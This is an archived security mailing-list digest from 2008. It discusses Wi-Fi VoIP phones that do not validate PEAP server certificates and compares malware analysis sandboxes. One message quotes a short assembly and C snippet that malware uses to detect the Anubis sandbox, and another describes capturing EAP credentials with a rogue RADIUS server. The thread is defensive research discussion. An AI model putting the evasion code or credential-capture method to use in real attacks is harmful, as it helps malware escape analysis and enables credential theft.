Cc: dailydave at lists.immunitysec.com
Subject: Re: [Dailydave] Cisco and Vocera wireless LAN VoIP devices don't
check certificates

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

| That means you can basically put up your own bogus access point with a
rogue
| RADIUS backend with your own self-signed digital certificate claiming it's
| the same as the certificate the client is use to seeing.  Since the client
| never bothers to cryptographically check the signature, it thinks it's
| talking to the right server and it will send its hashed password or pin to
| the server making it very easy to crack.

Similarly, if you have a valid certificate for RADIUS from a trusted CA
for any organization, you can impersonate other legitimate RADIUS
servers and get access to inner EAP authentication credentials (MS-CHAP,
PAP and CHAP, for example).

This was the premise for the talk I gave with Brad Antoniewicz at
Shmoocon on Sunday FreeRADIUS WPE (Wireless Pwnage Edition) simplifies
this attack by customizing FreeRADIUS behavior and configuration:

http://www.willhackforsushi.com/FreeRADIUS_WPE.html

- -Josh
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (Darwin)

iQIVAwUBR72KDjWX3FIa1TkuAQLHVBAAhdLLWhe9WR10X/JX+KIdYcjsEov6WHYN
hSVlGkgEfO2EJEBycEd0S7JFOyAa5ZBORKOi4p2ayzVPWR2aOmiaTDi+cndlpzUs
jYc7+5amS3Qz78F2CIMXbgewTFBEdTdjn09P6ktCNTi+uyLC5D2Ldup0QFt4ljH2
42RQhKe47B8fGqtxYlGZWr/9vnXIUsmfZ5G8+8fCbmuJ1fG21Ie7AQu5Hfn1kMH7
fAcXO/oVPAE+GcF2kd+MhiabcLz+Zz1zLCbi1cKSt4+7HCj7UlyXaoKopdRLQqXP
TqcUK+B31hcQV1il+acA1QzrVAlet6yNtDDVhmPejtrumQdF4YTQ1bUoIZQ/ulj2
fRT0/51xRFcuDJ0xXDOZ/2cc5FyMBy2jkAP9GBXIYvCeMJJr9d2V6cnUqxYdopP7
lPLQkH3wTB3TVdQ9wt0GhGqVR//ZBoBcBFNiufhOI9VqRgxj+ing9Z0IVjrKhIa4
kkwvFsqllPzGwh5mvMMJmWnB6M6AzWkSBVrsLPNkrBIUgPdDhQ4XNMU+Y3jQdpI0
9oUB4L+btWsB9VcbZ4ue4y98kurISwg1ezhRHw9EfT/6J1/M1OQhfRbSJ+GWITLZ
Um7xR7MgN9byDgRtfxeTFsCx5p/0gNXI06awlDjK8E//1whGt5jARiTKQOxWM63F
sOFFVJvfPF8=
=z8q7
-----END PGP SIGNATURE-----


From jwright at hasborg.com  Thu Feb 21 09:26:23 2008
From: jwright at hasborg.com (Joshua Wright)
Date: Thu, 21 Feb 2008 09:26:23 -0500
Subject: [Dailydave] Cisco and Vocera wireless LAN VoIP devices don't
 check	certificates
In-Reply-To: <000101c87482$9ee0c400$dca24c00$@net>
References: <000101c87482$9ee0c400$dca24c00$@net>
Message-ID: <47BD8A0F.8000901@hasborg.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

| That means you can basically put up your own bogus access point with a
rogue
| RADIUS backend with your own self-signed digital certificate claiming it's
| the same as the certificate the client is use to seeing.  Since the client
| never bothers to cryptographically check the signature, it thinks it's
| talking to the right server and it will send its hashed password or pin to
| the server making it very easy to crack.

Similarly, if you have a valid certificate for RADIUS from a trusted CA
for any organization, you can impersonate other legitimate RADIUS
servers and get access to inner EAP authentication credentials (MS-CHAP,
PAP and CHAP, for example).

This was the premise for the talk I gave with Brad Antoniewicz at
Shmoocon on Sunday FreeRADIUS WPE (Wireless Pwnage Edition) simplifies
this attack by customizing FreeRADIUS behavior and configuration:

http://www.willhackforsushi.com/FreeRADIUS_WPE.html

- -Josh
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (Darwin)

iQIVAwUBR72KDjWX3FIa1TkuAQLHVBAAhdLLWhe9WR10X/JX+KIdYcjsEov6WHYN
hSVlGkgEfO2EJEBycEd0S7JFOyAa5ZBORKOi4p2ayzVPWR2aOmiaTDi+cndlpzUs
jYc7+5amS3Qz78F2CIMXbgewTFBEdTdjn09P6ktCNTi+uyLC5D2Ldup0QFt4ljH2
42RQhKe47B8fGqtxYlGZWr/9vnXIUsmfZ5G8+8fCbmuJ1fG21Ie7AQu5Hfn1kMH7
fAcXO/oVPAE+GcF2kd+MhiabcLz+Zz1zLCbi1cKSt4+7HCj7UlyXaoKopdRLQqXP
TqcUK+B31hcQV1il+acA1QzrVAlet6yNtDDVhmPejtrumQdF4YTQ1bUoIZQ/ulj2
fRT0/51xRFcuDJ0xXDOZ/2cc5FyMBy2jkAP9GBXIYvCeMJJr9d2V6cnUqxYdopP7
lPLQkH3wTB3TVdQ9wt0GhGqVR//ZBoBcBFNiufhOI9VqRgxj+ing9Z0IVjrKhIa4
kkwvFsqllPzGwh5mvMMJmWnB6M6AzWkSBVrsLPNkrBIUgPdDhQ4XNMU+Y3jQdpI0
9oUB4L+btWsB9VcbZ4ue4y98kurISwg1ezhRHw9EfT/6J1/M1OQhfRbSJ+GWITLZ
Um7xR7MgN9byDgRtfxeTFsCx5p/0gNXI06awlDjK8E//1whGt5jARiTKQOxWM63F
sOFFVJvfPF8=
=z8q7
-----END PGP SIGNATURE-----

From thorsten.holz at gmail.com  Thu Feb 21 10:51:24 2008
From: thorsten.holz at gmail.com (Thorsten Holz)
Date: Thu, 21 Feb 2008 16:51:24 +0100
Subject: [Dailydave] VPC
In-Reply-To: <47BD746D.5040201@immunityinc.com>
References: <47BD746D.5040201@immunityinc.com>
Message-ID: <5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>

On Thu, Feb 21, 2008 at 1:54 PM, Dave Aitel <dave at immunityinc.com> wrote:

>  There's another one called CWSandbox that has a free web form you can
>  send exe's to.

You can either send a sample to <https://cwsandbox.org/?page=submit>
or <http://research.sunbelt-software.com/submit.aspx>
More info about the tool is available in an article
(<http://pi1.informatik.uni-mannheim.de/filepool/publications/j2holz.pdf>)
 and an example report is
<https://cwsandbox.org/?page=details&id=156851&password=iokop>

> (They hook a bunch of things but I think you can escape
>  the hooking by calling system calls directly?)

But then you are not platform independent. CWSandbox was originally
designed to automatically analyze the malware we capture with the help
of honeypots (worms, bots, ...), but has evolved a lot since then.

Cheers,
  Thorsten

From dr at kyx.net  Fri Feb 22 05:39:30 2008
From: dr at kyx.net (Dragos Ruiu)
Date: Fri, 22 Feb 2008 02:39:30 -0800
Subject: [Dailydave] CanSecWest 2008 Mar 26-28
Message-ID: <200802220239.30889.dr@kyx.net>

CanSecWest 2008 Presentations

Snort 3.0 - Marty Roesch, Sourcefire

Cross-Site Scripting Vulnerabilities in Flash Authoring Tools - Rich  
Cannings, Google

Proprietary RFID Systems - Jan "starbug" Krissler and Karsten Nohl, CCC

Media Frenzy: Finding Bugs in Windows Media Software - Mark Dowd and  
John McDonald, IBM ISS

Targeted Attacks and Microsoft Office Malware - Rob Hensing, Microsoft

Virtually Secure - Oded Horovitz, VMWare

Malicious Cryptography - Fr?d?ric Raynal and Eric Filiol, Sogeti/Cap-Gemini 
and ESAT

The Death of AV Defense in Depth: Revisiting Anti-Virus Software -  
Thierry Zoller and Sergio Alvarez, nRuns

VMWare Issues - Sun Bing, McAfee

Intrusion Detection Systems Correlation: a Weapon of Mass  
Investigation - Sebastien Tricaud and Pierre Chifflier, INL

Web Wreck-utation - Dan Hubbard and Stephan Chenette, WebSense

Secure programming with gcc and glibc - Marcel Holtmann, Intel

Mobitex network security - olleB, toolcrypt.org

Peach Fuzzing - Michael Eddington, Leviathan

Fuzz by Number - Charlie Miller, Independent Security Evaluators

Fuzzing WTF? What Fuzzing Was, Is And Never Will Be. - Frank Marcus  
and Mikko Varpiola,Wurldtech / Condenomicon

Vulnerabilities Die Hard - Kowsik Guruswamy, Mu

Hacking Windows Vista - Dan Grifin, JW Secure

ExeFilter: a new open-source framework for active content filtering -  
Philippe Lagadec,NATO/NC3A

VetNetSec: Security testing for Extremists - Eric Hacker, BT INS

w3af: A framework to own the web - Andres Riancho, Cybsec

A Unique Behavioral Science Approach to Threats, Extortion and  
Internal Computer Investigations - Scott K. Larson, Stroz Friedberg

--
2008 Dojos

Vulnerability Discovery Demystified             Mark Dowd and Justin Schuh
The Exploit Laboratory - Advanced Edition               Saumil Shah
Advanced Honeypot Tactics               Thorsten Holz
Mastering the network with Scapy                Philippe Biondi
Voice over IP (VoIP) Security           Nico Fischbach
Practical 802.11 WiFi (In)Security              C?dric Blancher
Advanced Linux Hardening                Andrea Barisani
Defend The Flag         Microsoft

--
2008 PWN 2 OWN

There will be three targets:
        A MacBook Air, running the latest OSX, patched, typical configuration.
        A Sony VAIO VGN-TZ37CNB, running Ubuntu, latest release.
        A Fujitsu U810, Running Vista, latest update.

The contest will be adjudicated by our impartial celebrity judge:

Ronald C. Dodge JR., Ph.D.
Lieutenant Colonel, Academy Professor
Associate Dean, Information and Education Technology,
United States Military Academy

The victory conditions will be the contents of specific 
specially  planted files on each system, to be extracted 
by winners. Hack them and you get to keep them, and 
any associated prizes for the exploits used, oh and the
fame and glory. :-)

Browsers (I.E., Mozilla, Safari), Mail Clients (Outlook, 
Mail.app,  Thunderbird), and IM clients (MSN, Adium, 
Pigdin, Skype all platforms) are all in scope.
More details and official rules soon.

cheers,
--dr
-- 
World Security Pros. Cutting Edge Training, Tools, and Techniques
Vancouver, Canada   March 25-28 - 2008    http://cansecwest.com
pgpkey http://dragos.com/ kyxpgp

From Thierry at Zoller.lu  Fri Feb 22 05:12:08 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Fri, 22 Feb 2008 11:12:08 +0100
Subject: [Dailydave] VPC
In-Reply-To: <47BD746D.5040201@immunityinc.com>
References: <47BD746D.5040201@immunityinc.com>
Message-ID: <753218234.20080222111208@Zoller.lu>

Dear Dave,
DA> There's another one called CWSandbox that has a free web form you can
DA> send exe's to. (They hook a bunch of things but I think you can escape
DA> the hooking by calling system calls directly?)
CWSandbox [1] uses Vmware (afaik)
cws_[pid]_mutex
cws_[pid]_event_data 
cws_[pid]_event_result 
cws_[pid]_mapping
290 hooked apis
10 hooked methods


[1]
http://pferrie.tripod.com/papers/attacks2.ppt

-- 
http://secdev.zoller.lu
Thierry Zoller


From Thierry at Zoller.lu  Fri Feb 22 05:15:31 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Fri, 22 Feb 2008 11:15:31 +0100
Subject: [Dailydave] VPC
In-Reply-To: <47BD9230.2090502@msu.edu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu>
Message-ID: <759087508.20080222111531@Zoller.lu>

Dear Jared DeMott,

JD> Actually Norman and CW both have a web interface.  However, I believe CW
JD> to be a bit better -- based on one case study of newer malware.  I just
JD> did some research and wrote a paper/created slides for a talk I'm giving
JD> at a local west Michigan sec group.  I put the slides up on my site if
JD> anyone would like to take a peek:
JD> http://www.vdalabs.com/tools/malware.html
Hint : There are better ones than CWsandbox,
- Joebox
- Anubis (qemu -> easy to detect)


-- 
http://secdev.zoller.lu
Thierry Zoller


From Thierry at Zoller.lu  Fri Feb 22 09:34:58 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Fri, 22 Feb 2008 15:34:58 +0100
Subject: [Dailydave] VPC
In-Reply-To: <759087508.20080222111531@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu>
	<759087508.20080222111531@Zoller.lu>
Message-ID: <1929059158.20080222153458@Zoller.lu>

Dear All,
TZ> Hint : There are better ones than CWsandbox,
Since the CWSandbox author is on this list, I wanted to clarify that I
have  no  intention  on  making  CWsandbox  look  less  performant, my
impression is from several tests I made myself and based on the fact
that  it  can  be  esaily  detected.  However  I am not sure about the
internal  improvements,  maybe  the  sandbox  is  better now. Again no
intention to harm here.





-- 
http://secdev.zoller.lu
Thierry Zoller


From demottja at msu.edu  Fri Feb 22 09:41:50 2008
From: demottja at msu.edu (Jared DeMott)
Date: Fri, 22 Feb 2008 09:41:50 -0500
Subject: [Dailydave] VPC
In-Reply-To: <1929059158.20080222153458@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu>
	<759087508.20080222111531@Zoller.lu>
	<1929059158.20080222153458@Zoller.lu>
Message-ID: <47BEDF2E.6050507@msu.edu>

Thierry Zoller wrote:
> Dear All,
> TZ> Hint : There are better ones than CWsandbox,
> Since the CWSandbox author is on this list, I wanted to clarify that I
> have  no  intention  on  making  CWsandbox  look  less  performant, my
> impression is from several tests I made myself and based on the fact
> that  it  can  be  esaily  detected.  However  I am not sure about the
> internal  improvements,  maybe  the  sandbox  is  better now. Again no
> intention to harm here.
>   
No need to back off now, no ones going to crucify anyone for their 
opinion.  I just wanted to start a thread on this, as it's an area I'd 
like to look into more.
Jared

From demottja at msu.edu  Fri Feb 22 10:41:21 2008
From: demottja at msu.edu (Jared DeMott)
Date: Fri, 22 Feb 2008 10:41:21 -0500
Subject: [Dailydave] VPC
In-Reply-To: <759087508.20080222111531@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu>
	<759087508.20080222111531@Zoller.lu>
Message-ID: <47BEED21.3040406@msu.edu>


> Hint : There are better ones than CWsandbox,
> - Joebox
>   
I just took a very quick look at Joebox.  Seems like it has potential, 
but not currently better than CWSandbox.  For example, Joebox analysis 
says:

"The attached zip document contains all kind of behaviour information which Joebox has detected. 
Please note that Joebox currently only analyse file system, registry system and process system behaviour. 
Analysis information aboutnetwork, services and thread activities will be added in the next months. 
The analysis machine which executes your submitted binaries has no access to the internet. 
An all time available internet connection is a too high risk either to be detected (via dns) or to be controlled by malware (we use real machines to analyse) which bypasses our used disk protection tools."


My first and (seriously) humble opinion would be to correct typos in the 
automated response.

Blessings,
Jared

From kbaumgartner at pctools.com  Fri Feb 22 11:44:22 2008
From: kbaumgartner at pctools.com (Kurt Baumgartner)
Date: Fri, 22 Feb 2008 09:44:22 -0700
Subject: [Dailydave] VPC
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu>
	<759087508.20080222111531@Zoller.lu>
Message-ID: <B2274B76996ABA428D55C682B497EF681C87AF@col-exc.guideworks.local>

>Hint : There are better ones than CWsandbox,
>- Joebox
>- Anubis (qemu -> easy to detect)

ThreatExpert too:
www.threatexpert.com

Evasion techniques are implemented in active malcode for all of them.
The most common techniques target vmware, emulator weaknesses, or
directories and components of the frameworks themselves. 

Oh look, here's another one:
"Here is an assembly code chunk we extracted from an ITW worm. This code
is an attempt to detect Anubis:
sub esp, 104h
lea eax, [esp+0]
push ebx
push offset aCInsidetm ; "C:\\InsideTm\\"
push eax ; str1
xor bl, bl ; status (bl) = 0
call ds:strstr

The disassembly matches up somewhat with some proposed Anubis-detecting
c code fairly recently posted to an underground forum:
char ModulePath[MAX_PATH];
GetModuleFileName(NULL, ModulePath, MAX_PATH);
p = strstr(ModulePath, "InsideTm");
if(p != NULL) return true;"
http://blog.threatfire.com/2008/01/chartreuse-pill.html


kurt

From demottja at msu.edu  Fri Feb 22 12:18:53 2008
From: demottja at msu.edu (Jared DeMott)
Date: Fri, 22 Feb 2008 12:18:53 -0500
Subject: [Dailydave] VPC
In-Reply-To: <5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>
References: <47BD746D.5040201@immunityinc.com>
	<5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>
Message-ID: <47BF03FD.3020101@msu.edu>

Thorsten Holz wrote:
> On Thu, Feb 21, 2008 at 1:54 PM, Dave Aitel <dave at immunityinc.com> wrote:
>
>   
>>  There's another one called CWSandbox that has a free web form you can
>>  send exe's to.
>>     
>
> You can either send a sample to <https://cwsandbox.org/?page=submit>
> or <http://research.sunbelt-software.com/submit.aspx>
> More info about the tool is available in an article
> (<http://pi1.informatik.uni-mannheim.de/filepool/publications/j2holz.pdf>)
>  and an example report is
> <https://cwsandbox.org/?page=details&id=156851&password=iokop>
>
>   
>> (They hook a bunch of things but I think you can escape
>>  the hooking by calling system calls directly?)
>>     
>
>   

One thing I like about sandboxes is that they take a higher level view 
of malware than a debugger type tool or IDA.  (So they tend to scale 
better than hiring more of us RE guys.)  So even if the malware has some 
crazy way of sending network data that isn't hooked by most tools ... 
shouldn't a good sandbox basically just have something like wireshark 
watching?  That way you're (relatively) sure you'll catch all net 
traffic?  As for malware being able to detect and poop-out if in a 
virtual environment, perhaps the CW guy can speak to that?  I think 
that's a real problem for most virtual environments like a sandbox.  So 
if its super critical we find out exactly what the malware is doing, and 
scaling is not a problem, perhaps a physical (but air gapped) net is the 
only way to role?

Jared

> But then you are not platform independent. CWSandbox was originally
> designed to automatically analyze the malware we capture with the help
> of honeypots (worms, bots, ...), but has evolved a lot since then.
>
> Cheers,
>   Thorsten
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>
>
>   

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080222/abc7cd6f/attachment.htm 

From arr at watson.org  Fri Feb 22 19:05:39 2008
From: arr at watson.org (Andrew R. Reiter)
Date: Fri, 22 Feb 2008 19:05:39 -0500 (EST)
Subject: [Dailydave] VPC
In-Reply-To: <1929059158.20080222153458@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu>
	<759087508.20080222111531@Zoller.lu>
	<1929059158.20080222153458@Zoller.lu>
Message-ID: <20080222185429.T83786@fledge.watson.org>


On Fri, 22 Feb 2008, Thierry Zoller wrote:

> Dear All,
> TZ> Hint : There are better ones than CWsandbox,
> Since the CWSandbox author is on this list, I wanted to clarify that I
> have  no  intention  on  making  CWsandbox  look  less  performant, my
> impression is from several tests I made myself and based on the fact
> that  it  can  be  esaily  detected.  However  I am not sure about the
> internal  improvements,  maybe  the  sandbox  is  better now. Again no
> intention to harm here.
>

Are you sure he means performance improvements (and I hope you mean 
performance because I do not believe "performant" is an englih word)?  I 
think he was inferring security issues.  The previous comment was "can't 
these hooks be bypassed  by doing direct system calls?"  not "why isn't 
this fast enough?"   While I understand the need for quick analysis, I 
think for automated systems, there needs to be an understanding that there 
must be correct and safe (relatively speaking) analysis -- or else you 
*should* assume your system will get hacked and will produce false 
negatives (in the end).  While this is not truely ideal, I tended to do 
alot of analysis of windows executables in a WinE-based environment (there 
were hand made modifications).  I can understand that this does not likely 
handle _all_ cases because WinE != M$ Windows -- so ... duh on that point. 
But, my point is... instead of going hack-for-hack ("you make certain 
calls? ok we'll hook them."  "oh, you're hooking them? ... in userland? 
hm, ok we'll call the system call api instead of your std lib call" "oh, 
you do that? hmm... we'll hook kernel land"  "oh? reaaally?.... " .... ) 
just turn the tables completely in terms of the very basic "expected 
state" of the runtime environment of the executable but still be able to 
run (and analyze) it.  This is why I truely like the folks who do rev eng 
of windows system code -- they can reveal the idiosyncrisis of the OSes 
tht the code is targetting and therefore be able to emulate it even "more 
better."

Cheers,
andrew

From propolice at gmail.com  Fri Feb 22 19:17:30 2008
From: propolice at gmail.com (Eduardo Tongson)
Date: Sat, 23 Feb 2008 08:17:30 +0800
Subject: [Dailydave] VPC
In-Reply-To: <1929059158.20080222153458@Zoller.lu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu>
	<759087508.20080222111531@Zoller.lu>
	<1929059158.20080222153458@Zoller.lu>
Message-ID: <b18fbe3c0802221617q6477b55ax4ab88505d568d6d8@mail.gmail.com>

Hi Thierry,

If I understand correctly, aps-AV runs the AV inside a sandbox. Is
this correct ? What sandbox are you using ?
...
In this process aps-AV will neither examine the data for known virus
signatures nor submit it to any parsing operations. Only after the
data has entered the execution environment, which next to running on a
high security operating system does not provide any network
interfaces, the AV-engines start their work and check the e-mail
attachments for malicious code. If any abnormality is detected, the
whole environment will be completely deleted, including the operating
system, and the incident will be marked as an attack on the respective
AV-product.
...

  Ed

On Fri, Feb 22, 2008 at 10:34 PM, Thierry Zoller <Thierry at zoller.lu> wrote:
> Dear All,
>  TZ> Hint : There are better ones than CWsandbox,
>  Since the CWSandbox author is on this list, I wanted to clarify that I
>  have  no  intention  on  making  CWsandbox  look  less  performant, my
>  impression is from several tests I made myself and based on the fact
>  that  it  can  be  esaily  detected.  However  I am not sure about the
>  internal  improvements,  maybe  the  sandbox  is  better now. Again no
>  intention to harm here.
>
>
>
>
>
>
>
>  --
>  http://secdev.zoller.lu
>  Thierry Zoller
>
>  _______________________________________________
>  Dailydave mailing list
>  Dailydave at lists.immunitysec.com
>  http://lists.immunitysec.com/mailman/listinfo/dailydave
>

From jsawyer at ufl.edu  Sat Feb 23 09:07:42 2008
From: jsawyer at ufl.edu (John H. Sawyer)
Date: Sat, 23 Feb 2008 09:07:42 -0500
Subject: [Dailydave] VPC
In-Reply-To: <47BF03FD.3020101@msu.edu>
References: <47BD746D.5040201@immunityinc.com>
	<5603eb730802210751w25526e4atc283a9eee19a6415@mail.gmail.com>
	<47BF03FD.3020101@msu.edu>
Message-ID: <AC4ED6DC-6AFC-4988-870D-73FC7C29C047@ufl.edu>

On Feb 22, 2008, at 12:18 PM, Jared DeMott wrote:

>  shouldn't a good sandbox basically just have something like  
> wireshark watching?  That way you're (relatively) sure you'll catch  
> all net traffic?  As for malware being able to detect and poop-out  
> if in a virtual environment, perhaps the CW guy can speak to that?   
> I think that's a real problem for most virtual environments like a  
> sandbox.  So if its super critical we find out exactly what the  
> malware is doing, and scaling is not a problem, perhaps a physical  
> (but air gapped) net is the only way to role?

That's the idea behind the TRUMAN sandnet. Joe Stewart released it in  
2006 (I think) and did a presentation about it at ShmooCon (and few  
other places). The setup can be as simple as two machines with a  
crossover cable. One of the systems is the controller that sniffs all  
network traffic and emulates services like DNS, SMTP, IRC, SMB, MySQL  
(scripts are included for those). You could add your own fake services  
and deploy nepenthes to collect malware as it is used to exploit  
services. The sacrificial host automatically downloads the malware  
from the controller and executes it. After running for X minutes,  
processes run on the host to collect data (registry changes, memory  
dump, etc). Once time is up, the machine reboots and via PXE booting,  
the sacrificial host is imaged back to the controller and a fresh  
image is placed back on it. Rinse and repeat. There is no Internet  
connection and everything can be fully self-contained.

TRUMAN
http://www.secureworks.com/research/tools/truman.html

Shmoocon video
http://www.shmoocon.org/2006/videos/Stewart-Malware.mp4

-jhs

From jsawyer at ufl.edu  Sat Feb 23 09:07:46 2008
From: jsawyer at ufl.edu (John H. Sawyer)
Date: Sat, 23 Feb 2008 09:07:46 -0500
Subject: [Dailydave] VPC
In-Reply-To: <B2274B76996ABA428D55C682B497EF681C87AF@col-exc.guideworks.local>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu>
	<759087508.20080222111531@Zoller.lu>
	<B2274B76996ABA428D55C682B497EF681C87AF@col-exc.guideworks.local>
Message-ID: <76202A93-2633-4582-A1D1-20B8F2A90581@ufl.edu>

On Feb 22, 2008, at 11:44 AM, Kurt Baumgartner wrote:

>> Hint : There are better ones than CWsandbox,
>> - Joebox
>> - Anubis (qemu -> easy to detect)
>
> ThreatExpert too:
> www.threatexpert.com
>
> Evasion techniques are implemented in active malcode for all of them.
> The most common techniques target vmware, emulator weaknesses, or
> directories and components of the frameworks themselves.
<CODE SNIPPED>

I came across several forum posts a few months ago when doing research  
that contained detection code for CWSandbox and Norman that was there  
for cut-n-paste so others could use it.

Detecting sandboxes is one of those, I dare say, arms races where the  
sandbox creators are trying to keep up with the detection techniques  
that the bad guys are developing. Even the script kiddies have access  
to the do-it-yourself malware creation tools. I was testing Shark 3  
when it was recently released and the "Anti Debugging" configuration  
page is:
"Terminate server,if it is being started on...
- VMWare
- Norman Sandbox
- Debugged mode
- Sandboxie
- Virtual PC
- Symantec Altiris SVS
- innotek VirtualBox (unstable)"

-jhs

From Thierry at Zoller.lu  Fri Feb 22 19:41:44 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Sat, 23 Feb 2008 01:41:44 +0100
Subject: [Dailydave] VPC
In-Reply-To: <47BEED21.3040406@msu.edu>
References: <47BD746D.5040201@immunityinc.com> <47BD9230.2090502@msu.edu>
	<759087508.20080222111531@Zoller.lu> <47BEED21.3040406@msu.edu>
Message-ID: <272529341.20080223014144@Zoller.lu>

Dear Jared,
True,  the  confusion  is  simply  one  of measurement - I was unclear
about "better". When   I  said  "better",  I meant the resitance against
detection. In my eyes a sandbox  that  is detectable has only limited
usefulness - at least in automated systems.

Some malware I've seen is actively detecing cwsandbox, sandboxie, norman and vmware
and is taking a different execution path and logic from there on. If you try to
detect  malware  using  sandboxes in an automatic fashion, that's a bad
prerequisite.

-- 
http://secdev.zoller.lu
Thierry Zoller


From Thierry at Zoller.lu  Fri Feb 22 21:17:46 2008
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Sat, 23 Feb 2008 03:17:46 +0100
Subject: [Dailydave] VPC
Message-ID: <974610891.20080223031746@Zoller.lu>

Dear Andrew ,
> (and I hope you mean
>performance because I do not believe "performant" is an englih word)
You get 10 points for your guessing skills, how difficult was it to get
the intented meaning out of "performant" ? ;)

My point in testing was mainly this one, if your sandbox is detectable
there is no need to have one, since the malware code will simply decide
to act differently... easy with cwsandbox, easy with norman, difficult
with joebox.


-- 
http://secdev.zoller.lu
Thierry Zoller


From tyler at hudakville.com  Sat Feb 23 15:34:09 2008
From: tyler at hudakville.com (Tyler)
Date: Sat, 23 Feb 2008 15:34:09 -0500
Subject: [Dailydave] VPC
In-Reply-To: <974610891.20080223031746@Zoller.lu>
References: <974610891.20080223031746@Zoller.lu>
Message-ID: <47C08341.80800@hudakville.com>

> My point in testing was mainly this one, if your sandbox is detectable
> there is no need to have one, since the malware code will simply decide
> to act differently... easy with cwsandbox, easy with norman, difficult
> with joebox.

To play devil's advocate, by your reasoning, if any tool is detectable 
there is no reason to have it.  (Since a sandbox is really nothing 
more than a tool.)  As you, I have seen many pieces or malware act 
differently, or not at all, if it detects VMs or a sandbox, but I have 
also seen pieces of malware do the same if it detects common analysis 
tools.

I truly believe sandboxes, and logically extended, sandnets will play 
a huge roll in malware analysis in the future.  I've been doing alot 
of research on them recently and have given a couple presentations[1] 
in the last few months (not that I'm saying I'm an expert by any means 
whatsoever).

However, like all security things, they will never replace the person 
sitting behind the computer interpreting the results and performing 
more analysis.  CWSandbox and Norman are getting picked on right now 
because they are the most used - give it time and people will figure 
out how to detect others like Anubis, Joebox and any others (if they 
haven't already).  In other words, use them as a tool not a solution.

Tyler


[1] - 
http://www.korelogic.com/Resources/Presentations/Burying_Your_Head_in_the_SandNet.pdf

From george_ou at lanarchitect.net  Sat Feb 23 18:43:25 2008
From: george_ou at lanarchitect.net (George Ou)
Date: Sat, 23 Feb 2008 15:43:25 -0800
Subject: [Dailydave] Cisco confirms vulnerability in 7921 Wi-Fi IP phone
Message-ID: <00ff01c87675$e259b440$a70d1cc0$@net>

Two days after news of the Vocera Wi-Fi VoIP communicator PEAP security
bypass vulnerability, I received confirmation from Cisco that their model
7921 Wi-Fi VoIP phone is also vulnerable to the same issue where digital
certificates aren't cryptographically verified.  Both Cisco and Vocera have
told me that they intend to fix future implementations of PEAP and do the
necessary steps to ensure certificate authenticity.  Cisco released the
following statement.

"Cisco confirms that the Cisco wireless IP phone model 7921 does not
currently validate server certificates when configured to use PEAP
(MS-CHAPv2). The Cisco 7920 model does not support PEAP. Cisco is planning a
long term solution to enable the option of client-side validation of server
certificates with PEAP; however, we do not currently have a time line for
when a software upgrade will be available. To work around the problem,
administrators can configure EAP-TLS as an alternative to PEAP while
ensuring mutual client-server authentication."

Details at http://blogs.zdnet.com/security/?p=901


George Ou, CISSP
ZDNet Editor at Large (CNET Networks)
http://blogs.zdnet.com/Ou
http://blogs.zdnet.com/security




From jms at bughunter.ca  Sat Feb 23 22:48:18 2008
From: jms at bughunter.ca (J.M. Seitz)
Date: Sat, 23 Feb 2008 19:48:18 -0800
Subject: [Dailydave] VPC
In-Reply-To: <47C08341.80800@hudakville.com>
References: <974610891.20080223031746@Zoller.lu>
	<47C08341.80800@hudakville.com>
Message-ID: <47C0E902.5020708@bughunter.ca>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey since everyone is having such a lively debate, and we all seem like
we wanna help, why not contribute? BoB (from PEid glory) and myself have
started a Malware and Unpacking Framework for ImmunityDebugger (MUFFI)
to help automate malware analysis tasks.

Some things that are in there so far:

- - lots of anti-anti debugging routines
- - VMWare cloaking
- - ummm...some other stuff

It's all done in Python and uses the native ImmDbg libraries to do its
business. We never really "released" it but we are always looking for
people to contribute to the source tree. If a piece of malware is using
a specific mechanism to do VM/sandbox detection, then write the reverse
and send us a patch!

http://muffi.googlecode.com/

JS

ps. You're never gonna win the war against malware, and yes the people
behind the monitor are the key. Hence, we should spend our time
enhancing the tools that we do have instead of having a running
commentary about how crappy a certain subset of tools are at dealing
with a particular subset of malware variants.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkfA6QIACgkQKEj7ZJktQNvTRgCgnI23Llt5dcR9aQ0317Zg7NhM
SscAni+RWmUM/hVu+s5QlHDa/4P0YgAR
=Ml12
-----END PGP SIGNATURE-----

From alex at sotirov.net  Sun Feb 24 03:39:58 2008
From: alex at sotirov.net (Alexander Sotirov)
Date: Sun, 24 Feb 2008 00:39:58 -0800
Subject: [Dailydave] VPC
In-Reply-To: <47BD746D.5040201@immunityinc.com>
References: <47BD746D.5040201@immunityinc.com>
Message-ID: <20080224083958.GA7952@dsl093-068-003.sfo1.dsl.speakeasy.net>

On Thu, Feb 21, 2008 at 07:54:05AM -0500, Dave Aitel wrote:
> So in the Microsoft/Immunity/iSec Defend the Flag class here at BlackHat 
> Federal, I learned the hard way that VPC moves memory all around and 
> your previously great universal addresses don't work. So you'll end up 
